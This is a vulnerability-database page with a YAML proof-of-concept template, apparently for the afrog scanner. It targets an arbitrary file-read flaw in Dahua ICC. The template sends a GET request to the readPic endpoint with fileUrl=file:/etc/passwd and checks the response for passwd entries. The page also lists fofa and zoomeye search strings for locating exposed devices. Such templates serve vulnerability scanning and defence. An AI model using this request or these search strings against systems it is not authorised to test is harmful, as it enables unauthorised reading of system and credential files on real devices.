dahua-icc-readpic-fileread: Dahua Icc Readpic File Read

2025-08-01 Dahua Icc Readpic File Read PoC Public

Description

Read Dahua Icc file

fofa: body="*客户端会小于800*"

zoomeye: *客户端会小于800*

PoC

id: dahua-icc-readpic-fileread

info:
  name: Dahua Icc Readpic File Read
  author: zan8in
  severity: high
  verified: true
  description: |-
    Read Dahua Icc file
    fofa: body="*客户端会小于800*"
    zoomeye: *客户端会小于800*
  tags: dahua,fileread
  created: 2023/11/01

rules:
  r0:
    request:
      mehtod: GET
      path: /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities